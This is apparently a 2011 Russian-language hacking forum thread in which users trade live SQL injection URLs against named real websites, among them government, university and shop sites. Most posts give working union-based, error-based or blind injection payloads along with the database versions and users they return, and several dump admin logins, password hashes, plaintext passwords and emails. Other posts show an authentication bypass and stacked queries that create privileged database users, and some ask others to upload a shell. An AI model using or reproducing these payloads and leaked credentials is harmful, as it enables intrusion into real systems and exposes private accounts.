http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,3,version(),5,6,7,8--+
Буагагагага!!!!
http://www.colours-shop.com/news/new.php?id=9+union+select+1,version(),user()/*
http://onlineofG00GLE IS OUTfshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb%27+UNION+SELECT+1,2,3,group_concat(versio n(),0x3a,user(),0x3a,database())+--+
Cennarios said:
http://www.y12.doe.gov/news/release.php?id=201+union+select+1,2,3,4,5,6,7,8,9, 10,11--+
http://www.whwebhosting.com/whmsys/announcements.php?id=-1'/**//*!union*//**//*!select*//**/1,2,version(),4,5/**/--+
http://webcolos.de/site/index.php?id=3310&pakketnummer=1'+union+select+1,user(),3,4,5,6,7--+
http://www.mainbase.de/news.php?id=-6+union+select+1,2,version(),4,5,6,7--+
http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,3,version(),5,6,7,8--+
Буагагагага!!!!
Я добил
Code:
http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,login,password,5,6,7,8 FROM users LIMIT 56,1 --+
http://www.allurebridals.com/index.php?id=-2+union+select+1,2,3,4,group_concat(concat_ws(0x3a ,email,password)+separator+0x3c62723e),6,7,8,9,10, 11,12,13,14+from+users--
dbo295655462@74.208.180.13:db295655462:5.0.91-log
Cennarios
15.02.2011, 22:25
http://www.fao.org/news/story/en/item/51042%20or%201%20group%20by%20concat((select%20ver sion()),floor(rand(0)*2))%20having%20min(0)/icode/
PR9
Аффтар!!! ЯЯаааду мне!!! =))
Hack_ERR++
17.02.2011, 15:32
Code:
http://www.ansdrive.ba/bs/page.php?id=-23+union+select+1,2,version()--
http://www.cybernet.cd/adresse.php?id=23+union+select+1,2,3,version(),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28--
Subscribe
18.02.2011, 02:43
http://www.thevalleypost.com/article.php?id=473-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
asql said:
TABLE_NAME=’news’ кавычки экранизируютса. Как это обойти?
Я только начинаю изучение SQL, так что...
http://moreprom.ru/news.php?id=-1/**/union/**/select/**/1,user(),COLUMN_NAME/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x6e657773/**/LIMIT/**/0,1--
Code:
http://gps.smartzone.ru/razdel.php?id_raz=-1+UNION+SELECT+1,user()--¶m=list
phpbb3_users
client
smartzone_users
danielito
19.02.2011, 22:53
http://indabattle.com/Malenkiy_Pavlik/?page=-255+union+select+1,2,3,table_name,5+from+informati on_schema.tables+limit+222,1--
админка /administrator
Сможет кто шелл залить? или в админку зайти
пассы вида md5:salt
Hack_ERR++
21.02.2011, 11:17
Code:
http://autocatalog.bg/marka.php?id=-23+union+select+1,2,3,concat_ws(0x20,type,password ),5,6+from+admin_users--
http://www.bigbay.bz/develdesc.php?id=-23+union+select+1,concat_ws%280x20,id,username,pas sword%29,3,4,5,6,7,8,9,10,11,12,13+from+prop_admin--
Code:
http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+11--
http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+SYSDATE--
Подобные команды работают, что дает основания полагать, что субд - оракл, а таблица имеет 11 колонок. Если кто хорошо знаком с ораклом, можете поиграться. Или тут вряд ли можно что-то полезное раздобыть?
Cennarios
21.02.2011, 18:18
http://www.exploratorium.edu/imaging_station/gallery.php?Asset=Human%20red%20blood%20cells&Group=&Category=Blood%20Cells&Section=Introduction'+or+1+group+by+concat((select +user()),floor(rand(0)*2))+having+min(0)--+
user:imaging_station@www1.exploratorium.edu
smallville
http://smallville.fanwebsite.co.uk/music.php?smallville_episodeid=-67+union+select+1,version%28%29,3,4,5--
//система антибаян описана в первом посте
ничего личного
http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char( 58),@@version,user(),database(),@@version_compile_ os),3,4,5,6,7--
5.1.47-rel11.2-log djklm38@localhost djklm38_forall unknown-linux-gnu
http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char( 58),username,password,email),3,4,5,6,7%20from%20er z_users--
winstrool
22.02.2011, 14:23
_http://k156.ru/2/1/catview.php?cat_id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--
_http://monolit44.ru/catviewarm.php?catarm_id=-10+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user())--
_http://stroyvektor.com/foto.php?fot=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7--
_http://citadel-kostroma.ru/catviewflat.php?cat57_id2=-9+union+select+concat_ws(0x3a,version(),database() ,user())--
_http://www.newchemistry.ru/himprocesses.php?cat_id=-36+union+select+concat_ws(0x3a,version(),database( ),user())--
_http://www.marich.od.ua/board.php?cat_id=-2+union+select+concat_ws(0x3a,version(),database() ,user())--
danielito
22.02.2011, 18:18
http://www.astrakhanfm.ru/news/news.php?id=99999+union+select+1,2,3,4,version(),6 ,7--
http://la2-shop.ru/articles.php?id=-2'+union+select+1,2,version()--'
сплошная дырка...
http://www.doneco.org.ua/showwork.php?id=9999+union+select+1,version()--
4.1.22-standard-log...(
Бар SПБ.
h**p://www.barspb.ru/places.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
Версия: 5.1.50-log
Юзер: u276147@10.8.3.13
http://www.voladm.gov.ua/news.php?id=50901+union+select+1,user(),3,4,5,data base(),7,8,9,10,11,12,13,14--
http://www.cva.edu/gallery/detail.php?ID=86-999.9+union+select+1,2,3,4,5,6,7--
http://biophysics.asu.edu/CBP/seminars.php?type=Meeting&ID=10647-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
http://www.arabpressnetwork.org/newspapersprint.php?id=173-999.9+union+select+1,2,3,4,5--
http://www.mywowgold.ru/modules/zakaz/?data[form][blank_amount]='
wcg.ru PR-5
h**p://www.wcg.ru/grandfinal/index.php?ID=-1+union+select+1,2--
h**p://www.wcg.ru/wcgtv/addcnt.php?ID=-1+union+select+1--
Version: 5.1.37
Database: wcg
User: wcg@localhost
nemaniak
25.02.2011, 23:33
russobit-press.ru
Code:
http://russobit-press.ru/forum.php/news.php?language=&stage=message&show=-31212+union+select+concat_ws(0x3a,version(),user() ,database()),2,3,4,5,6,7,8--
Code:
5.0.45:root@localhost:rbit
kansaspublicradio.org PR-5
Code:
http://kansaspublicradio.org/newsstory.php?itemID=15091+and+substring((SELECT+v ersion()),1,1)=5+--+
caldwellschools.org PR-5
Code:
http://www.caldwellschools.org/News/FullStory.php?NewsID=842+or+(select+count(*)+from+ (select+1+union+select+2+union+select+3)x+group+by +concat(mid(version(),1,63),floor(rand(0)*2)))+--+
Code:
Duplicate entry '5.0.261' for key 1
http://hyenacart.com/bellajunction/index.php?info=null+and+1=2+union+select+1,version (),3,4,5,6
4.1.22-standard
acmenoveltyarchive.org
PR 4
Code:
http://www.acmenoveltyarchive.org/category.php?cat=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3 --
stormdance.de
PR 4
Code:
http://www.stormdance.de/?cat=-22 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database ()),7,8,9 --
citymagazine.rs
PR 5
Code:
http://www.citymagazine.rs/page.php?cat=4 union select info() --
ipv6.njust.edu.cn
.edu
PR 1
Code:
http://ipv6.njust.edu.cn/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7,8,9,10,11,12,13,14,15 --
http://www.auction.spb.ru/?lotID=16209+and+0+union+select+1,2,3,4,5,6,7,8,9, 10,concat_ws(0x3a,login,password,email),12,13,14,1 5,16,17,18,19,20,21+from+users
stasiliy
28.02.2011, 13:59
http://www.specialradio.ru/mkz/?id=-5+union+select+1,2,3,group_concat(version(),databa se(),user()),5,6,7,8,9--
bloodAngel
28.02.2011, 20:03
Code:
http://www.florenceforfun.org/index.php?id=%28select%201%20from%20%28select%20co unt%280%29,concat%28%28select%20version%28%29%29,f loor%28rand%280%29*2%29%29%20from%20information_sc hema.tables%20group%20by%202%20limit%201%29a%29
version :5.1.53-0.dotdeb.01
database :'mySql9296_fff1'
user : mySql9296@11.11.11.651
Code:
h ttp://www.mete.gov.al/galeri_info.php?l=a&p=44&ida=-2+union+select+1,2,3,concat_ws%28database%28%29,0x 3a,version%28%29,0x3a,user%28%29%29,5,6
database :web192db1
version: 5.0.77
user : web192u1@localhost
Code:
http://howtoremovecar.co.nz/gallery-main.php?gid=-5+union+select+1,2,group_concat%280x3a,username,0x 3a,password%29,4,5+from+admin_mst
admin:0f6969d7052da9261e31ddb6e88c136e :remove
Code:
http://www.meggitttrainingsystems.com/main.php?id=42+union+select+1,concat%280x3a,userna me,0x3a,password%29,3,4,5,6+from+fulfillment_users
chad.shaw@meggitt.com (mailto:chad.shaw@meggitt.com):meggitt
Code:
http://freecarremovals.co.nz/gallery-main.php?gid=-5+union+select+1,2,group_concat%280x3a,username,0x 3a,password%29,4,5+from+admin_mst
:admin:5797b26ee425c46a1de0a741885dcc0a :removals
http://www.creativephotographyinc.biz/page.php?pID=null+and+1=2+union+select+1,2,3,4
Code:
h**p://www.mymym.com/en/gbook.php?owner=1+union+select+1,2,3--
Version: 5.0.51a-24+lenny5�
Database: meetyourmakers@212.224.124.4
User: �meetyourmakers_www
http://www.automotorplex.com/page.php?id=1+union+select+1,database(),3,4,5
user:automoto_dbadmin@localhost
ver:4.1.22-standard
base:automoto_AMP
http://nwmetalcraft.com/manufacturer-page.php?Id=-22+union+select+1,2,3,4,user(),6,7
user:nwmetalcraft@97.74.24.170
base:nwmetalcraft
datadir:/var/lib/mysql_data/3/
ver:5.0.91-log
http://www.wizardbrazleme.com.br/new/page.php?id=-1+union+select+1,2,3
user:wizardbrazleme@10.5.3.68
base:wizardbrazleme
version:5.1.52
http://www.marcosdan.com.br/page.php?id=-1+union+select+1,2,3
user:marcosdan@10.5.3.61
base:marcosdan
version:5.1.52
http://www.segundoidioma.com/page.php?Id=-1+union+select+1,2,3
user:segundoi_raiz@localhos
base:segundoi_osc1
version:5.0.91-community
Code:
http://www.gisa.ru/info_see.php?id=-528+UNION+SELECT+1,email,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58+from+secur_use rs+limit+1,5+--+
Code:
http://www.libroslibertad.ca/book.php?id=20+and+1=0+union+select+1,pwd,3,4,5,6, 7,8+from+users+--+
Code:
http://www.thedailybull.ca/article.php?id=-128+union+select+1,2,3,user_password,5,6,7,8,9,10+ from+phpbb_users+limit+1,15+--
Code:
http://esilibrary.ca/esi/newsitem.php?id=-140+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,3,4,5,6,7,8,9+--+
Cennarios
05.03.2011, 00:53
Говермент
Буяка бу!!!
http://ojj.la.gov/index.php?page=sub&id=-25/**//*!union*//**//*!select*/1,2,3,user%28%29,5,6,7,8,9--+
user:ojj_new@localhost
http://www.eskjaer-aa.dk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9
http://www.paneltech.dk/page.php?page=99&id=-1+union+select+version(),2,3
http://www.delbeckvignobles.com/page.php?id=1+union+select+1,2,version(),4,5,6
http://www.manieres-de.com/page.php?id=1+union+select+1,2
http://lologogo.free.fr/page.php?id=1+union+select+1,2,3,4,5,6,7,8
shams7.com
Code:
http://www.shams7.com/vbzoom/show.php?UserID=1&MainID=81&SubjectID=-14003 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 --
sportsnetsales.ca
PR 5
DB: snetsales
Code:
http://www.sportsnetsales.ca/show.php?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 --
rakedance.com
Сайт связанный с покером
rakedanc_rakedan@localhost:5.1.47-community-log:rakedanc_rakedance
Code:
http://www.rakedance.com/newsarc/show.php?id=-1 union select concat_ws(0x3a,user(),version(),database()) --
4nieuws.nl
Code:
http://4nieuws.nl/show.php?key=-24074 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12 --
billigehjemmesider.dk
DB: mysqluser14261
Слепая
Code:
http://demo.billigehjemmesider.dk/show.php?p=-104 union select user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
nemaniak
06.03.2011, 02:41
www.walsh.edu PR-5
Code:
http://www.walsh.edu/athleticsdetail.php?newsid=-874+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18+--+
Code:
5.0.77:walsh@localhost:Walsh
www.minnesotanationalguard.org PR-5
Code:
http://www.minnesotanationalguard.org/press_room/e-zine/articles/index.php?item=-484+UnIon+selECt+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21+--+
Code:
5.0.77-log:ng_internet@localhost:ng_internet
cit.mak.ac.ug PR-6
Code:
http://cit.mak.ac.ug/news_detail.php?item=-191+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6+--+
Code:
5.0.91-community:citmak_dbcit@localhost:citmak_fcit
https://www.kisantech.com/index.php?cat_id=1+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10--
A_n_d_r_e_i
07.03.2011, 01:59
http://www.medtehnika.org/catalog.php?id=-123+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13+--
Пр: 2
Code:
http://www[dot]switch-foot[dot]com/view_item.php?item_id=-25+union+select+1,2,concat_ws(0x3b,username,passwo rd)+from+switchfoot.admin_table+--+
Code:
http://shop[dot]bsens[dot]com/bsens/index.php?param=item&item_id=-114'+union+select+1,2,concat_ws(0x3b,user_name,pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37+from+bsens_db.user_admin+--+&item_type_code=1&category_id=9&
DarkDante
07.03.2011, 10:18
http://meander.ca/lyrics.php?key=song_title&ID=-78+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4--
http://www.almeidahotels.com/nm_quemsomos.php?id=-25/**/union/**/select/**/1,2,3,4,user(),6,7,8/*
http://www.worstpreviews.com/review.php?id=115+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41--+
os:unknown-freebsd7.2
basedir:/usr/local/
base:alexgi_worstreview
tmpdir:/usr/tmp
datadir:/usr/local/var/
user:alexgi_2@localhost
ver:5.0.91-log
http://www.nowt2do.co.uk/review.php?id=606+and+1=0+union+select+1,2--+
basedir:/
tmpdir:/tmp/
user:nowt2do@localhost
ver:5.0.92-community
datadir:/var/lib/mysql/
osc-linux-gnu
http://www.dvdholocaust.com/review.php?id=289+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29
basejdvdholodvdholo
userjdvdholonakedralocalhost
ospclinuxgnu
ver4122standard
http://www.paperbackreader.com/review.php?ReviewID=2113+and+1=0+union+select+1,2, 3,4,5,6,7,8,9--+
ver:5.0.91-log
userbrmain@64.202.163.153
basebrmain
basedir:/usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/
datadir:/var/lib/mysql_data/1/
tmpdir:/tmp/mysqltmp/
os:unknown-linux-gnu
cypee.com
Регистратор
Code:
http://cypee.com/photo/show.php?title=Arashdeep_Singh&id=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4 --
tvchaty.com
rain@localhost:5.0.51a-community:rain_tvchaty
Code:
http://tvchaty.com/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6 --
externat.kspu.ru
Code:
http://externat.kspu.ru/forum/thread.php?threadid=-304 union select 1 --
forumer.com
Code:
http://fireandwater.1.forumer.com/index.php?showtopic=-591 order by 1 --
nethands.de
Code:
http://www.nethands.de/pys/show.php?id=165&skin=-5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24 --
bmz.fr
Code:
http://www.bmz.fr/achat/index.php?catid=-11+union+select+1,version(),3,4%20--
seaandsea.fr
Code:
http://www.seaandsea.fr/achat/index.php?catid=-43+union+select+1,version()%20--
protek.fr
Code:
http://www.protek.fr/achat/index.php?catid=-63+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17%20--
saint-vrain91.fr
Code:
http://www.saint-vrain91.fr/rubrique.php?catId=-41+union+select+unhex(hex(version())),2,3,4,5%20--
fape.fr
Code:
http://www.fape.fr/lire/index.php?catid=3+and+1=2+union+select+1,2,group_c oncat(user(),0x3a,database(),0x3a,version()),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17%20--
Code:
http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=-752+union+select+1,2,3,4,5,6--
A_n_d_r_e_i
10.03.2011, 02:50
http://www.wavemovies.com/product.php?ID=-259+union+select+1,group_concat(column_name),3,4,5 ,6,7+from+information_schema.columns+where+table_n ame=0x636174616c6f67+--
Pr: 3
http://www.vitek.ru/compare.php?all=-46%20union%20select%201,2,version(),4+--+
ТИЦ450 PR5
A_n_d_r_e_i
10.03.2011, 15:45
http://windblowers.com/product.php?id=-73+union+select+1,2,3,4,group_concat(concat_ws(0x3 a,ID,Username,Password,FName,LName,LastUpdate,Acce ssLevel)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+WBtblUser--+
Pr: 4
http://www.mtucizone.ru/list/index.htm?action=student&id=2286+and+1=0+union+select+1,2,group_c oncat(user(),0x3a,version(),database()),4,5,6,7,8, 9,1 0,11,12,13--
Version-5.0.90
User-mtucizone@localhost
Database-mtucizone
слепая в датинге
http://www.findme4love.net/Gallery.Search.html?Lady=5080+and%20substring%28ve rsion%28%29,1,1%29=5&Submit=FindMe
bloodAngel
10.03.2011, 17:20
Code:
http://www.pchardware.ro/Reviews/review.php?id=-160+union+select+version%28%29--
Code:
http://www.worstpreviews.com/review.php?id=-115+union+select+group_concat%28column_name%29,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+information_schema.columns+where+tab le_schema=%27alexgi_worstreview%27+and+table_name= %27user_reviews%27
Code:
http://www.digital-storytime.com/review.php?id=70+order+by+57
version :5.1.54
Code:
http://www.theanswerline.com/SubCategoryList.php?catid=-149+union+select+1,2,3,4,5,6,7,8,9,10,11--
Braun
http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x 3a,@@version,user(),database(),@@version_compile_o s),4,5,6--
5.1.53-log fleyg@localhost braun-bl portbld-freebsd8.1
http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x 3a,c_login,c_passwd,c_email,c_company,c_fio,c_phon e),4,5,6%20from%20ricsom_clients%20limit%201%20off set%201--
nemaniak
11.03.2011, 16:43
www.patagonianexpeditionrace.com PR-5
Code:
http://www.patagonianexpeditionrace.com/en/news_detail.php?news=-38+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11,12,13+--+
Code:
5.0.91-log:sitio@cgi1103.int.bizland.net:sitio
wisdencricketer.com PR-6
Code:
http://wisdencricketer.com/item.php?parent_id=3&child_id=0&item_id=-419+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18+--+
Code:
5.0.77-log:ansonrobson.new@localhost:wisden
Code:
http://www.minormania.com/feature.php?catid=757&id=-2132+union+select+1,2,3,4,5,6,7,8,9,10--
citymagazine.rs
PR 5
Code:
http://www.citymagazine.rs/page.php?cat=4 union select info() --
4online.ru
Rank 2
Code:
http://www.4online.ru/tv/?channel=-104 union select 1,concat_ws(0x3a,user(),version(),database()),3,4, 5,6,7 --
ilikeamericanmusic.com
PR 3
Code:
http://www.ilikeamericanmusic.com/riff.php?EntryID=-1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()) --
aldwick.net
PR 2
Code:
http://aldwick.net/directory.php?id=-3 UNION SELECT 1,group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAM E),3 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
Code:
http://passionfitnesswear.com/ShoppingOnlineViewProduct.php?id_set=-1+union+select+1,group_concat(User,0x3b,Pass),3,4, 5,6,7,8,9,10+from+login
http://www.displaysbyrioux.com/product.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x207c7c20,vers ion(),user(),database()),6--
http://www.schulmerichbells.com/category.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x3a3a3a,versio n(),user(),database()),6,7,8,9,10,11,12--
http://www.southworth.com/page.php?id=9999999+union+select+concat_ws(0x3c666 f6e7420636f6c6f723d27726564273e202d7c7c2d20,versio n(),user(),database())--
http://www.carriertransicoldeurope.com/ml/service/service.php?sites=32+and+1=(select+version()::int+ from+pg_user)
http://www.jr-takashimaya.com/pc/pinf110h.php?id=&pass=&Category_ID=8&flg=o&daikb=1;create+user+Pun!sh3r;
http://www.kkt-sumai.jp/main/?category=8+and+1=(select+version()::int+from+pg_u ser)
Code:
http://platerfinancial.com/planning/
обход авторизации (MySQL)
username : ' or 1=1--+
password : ' or 1=1--+
Code:
http://www.powermate.com/air_compressors/products.php?cat_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8--
Version: 5.1.53-log
http://www.hotta.ru/model.php?id=-881+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,vers ion(),user(),database()),7,8,9,10,11,12,13,14--
v.4
Code:
http://www.hotelvictoriatrieste.com/hotel-Profile.html?id=-51+union+select+1,2,3,4,5,6,7,concat(username,0x3a ,password),9,10,11,12,13,14,15+from+wnbo_users--
5 ветка
http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat _ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--
Если кто зайдет в админку, отпишите плиз адрес (админки)
http://www.bbkingblues.com/bio.php?id=-10+union+select+1,2,concat_ws(0x3a3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--
48! ыЫ. Кто больше?
Code:
http://idm.com.np/newsdetail.php?id=-1+union+select+1,group_concat(username,0x3b,passwo rd),3,4,5,6+from+mytbladminlogin
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(userna me,0x3b,password),10,11+from+tbladmin
HellFire
14.03.2011, 11:22
Немецкая газетенка:
Code:
http://www.atlantic-times.com/archive_detail.php?recordID=1-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2 A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A6 56E64),0x71),0x71),6,7,8,9--
Database Version: 5.5.8
Database name: content
User name: content@localhost
LiRvD082
14.03.2011, 12:24
http://cat.rusbic.ru/?rgn=80&cn=1)+UNION+SELECT+null,null,cast(user+as+text),nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null--+
user=postgres
version()=PostgreSQL 8.3.11 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
current_database()=bb
inet_server_addr()=
Создаём нового пользователя:
id=27;CREATE USER hacker PASSWORD 'mypass';
Даём юзеру права на создание новых БД и новых пользователей:
id=27;ALTER USER test1 CREATEUSER CREATEDB;
http://cat.rusbic.ru/?id=76;CREATE TABLE аааа (b text);
http://irkutsk.ru/users/profile/4424
http://irkutsk.ru/login/
POST:uml=konstantin@lagutin.com';+--+&upass=dgfjh
login:konstantin@lagutin.com';+--+
pass:12345
http://rusuper.ru/objs/view1.php?id_city=30&id_obj=-3251+UNION+SELECT+1,2,3,group_concat(unhex(hex(col umn_name))),5,6,7,8,9+FROM+INFORMATION_SCHEMA.colu mns+where+table_name=0x7573657273--
stasiliy
14.03.2011, 20:46
http://pcboards.ru/show.php?dev=109+order+by+13
http://www.freehands.ru/game.php?set_phone_model=-148+union+select+null,null,group_concat(table_name +separator+0x3a)+from+information_schema.tables--
asql said:
http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat _ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--
Если кто зайдет в админку, отпишите плиз адрес (админки)
клац
/showthread.php?p=2596026#post2596026 (https://antichat.live/showthread.php/p/2596026/)
http://www.aist-climat.ru/catalog/list/?id=-6349%20and%201=2%20union%20select%201,concat_ws(ch ar(58),@@version,user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+--
4.1.25-log cms5ru69_aist@localhost cms5ru69_aist
http://www.texe.com/view.php?page=-34+union+select+1,group_concat(table_name+separato r+0x3a),3,4,5+from+information_schema.tables--
http://www.pandora.biz.ua/index.php?p=-35+union+select+1,2,group_concat(concat_ws(0x3a3a3 a,cat_id,root_cat,name_cat,descr,sh_descr,img,por) +separator+0x2a2a2a)+from+category--
http://thomasdane.myzen.co.uk/artist.php?artist_id=-9%20union%20select%201,2,3,version(),5+--+
Code:
http://www.saittrojans.com/teams/schedule.html?sportID=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,gr oup_concat(table_name)+from+information_schema.tab les--
5 ветка
bloodAngel
18.03.2011, 02:07
Code:
http://www.mtosmt.org/mto-announce.php?id=-74+union+select+1,group_concat%28table_name%29,3,4 ,5+from+information_schema.tables--
5.1.33-log / mtoadmin_db
Code:
http://www.go-whippet.co.uk/announce.php?id=1%20or%281,2%29=%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29
'5.0.77'
http://www.leoalexander.co.uk/index.asp?id=11+and+1=0+union+all+select+1,2,3,con cat_ws%280x3a,version%28%29,database%28%29,user%28 %29%29,5,6,7+--+
Результаты в тайтле страницы.
Удалось подобрать таблицу users (id, email, country). Парольного поля подобрать не получилось. В таблице данные 338 пользователей.
Вот прикольная инъекция
http://kapitoshka.lg.ua/gallery.php?page=2§ion=99999+union+select+version()--
догадайтесь где версия!)
bloodAngel
18.03.2011, 14:44
asql said:
Вот прикольная инъекция
http://kapitoshka.lg.ua/gallery.php?page=2§ion=99999+union+select+version()--
догадайтесь где версия!)
" href="pictures/gallery/5.0.51a-24+lenny5-log.jpg">"
Code:
http://www.globalalliancepr.org/event.php?id=-8+union+select+concat%28version%28%29,0x3a,databas e%28%29,0x3a,user%28%29%29
4.1.22:global_geral:global_geraladm@localhost
A_n_d_r_e_i
18.03.2011, 15:03
http://www.santaspen.net/content.php?id=-9+union+select+1,2,group_concat(0x3a3a,id_usr,emai l_usr,0x3a3a,password_usr),4,5+from+users_usr+--
Админка: http://www.santaspen.net/admin/index.php
Google PageRank (PR): 3
-----
http://www.flatsminsk.com/info.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,@@version,1 3+--
Админка: http://www.flatsminsk.com/admin/index.php
Тиц: 30
-----
http://rakurs.rovno.ua/info.php?id=-182+union+select+1,2,3,4,5,6,@@version,8,9,10,11,1 2,13,14+--
Тиц: 20
Google PageRank (PR): 2
-----
http://www.harrisinstitute.com/site/page.php?id=103+union+select+1,2,group_concat(user name,password,0x3a3a),4,5,6,7,8,9,10+from+tbl_user s+--
Админка: http://www.harrisinstitute.com/admin
Google PageRank (PR): 4
Admin:b75054364c277adfdca606e3300413a8:purples0177
http://teachers.yale.edu/curriculum/search/viewer.php?id=-initiative_09.01.01_u'+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),6,7,8,9,10,11,12+--+
5.0.77-log:res_teachers1:res_teachers@192.168.101.195:red hat-linux-gnu
Google PageRank (PR): 6
good.god
19.03.2011, 15:09
Code:
http://www.superav.com/fr/details_final.php?productID=-1+union+select+1,2,group_concat(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37
5.0.91-community:superav_MyMovie@localhost:superav_movie
вывод в титле.
http://www.nypdangels.com/cop/cop.php?id=-159+and+(select*from(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat_ws(0x3a,user(),@@version_compile_ os)+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64 ),floor(rand(0)*2)))z)+--+
5.0.91-log:nypdange_angels:nypdange_deespc@boscgi0102.eig box.net:unknown-linux-gnu
http://www.melges.com/?p=news&id=-1074+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os)+--+
5.0.77-log:409707_melges:409707_melges@172.17.3.93:redhat-linux-gnu
ТИЦ: 10
Google PageRank (PR): 4
Моя первая инъекция
Code:
http://www.magadangorod.ru/index.php?do=form&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat%28version% 28%29%29,10%20--
5.0.92-community-log
ТИЦ 210
PR 5
Code:
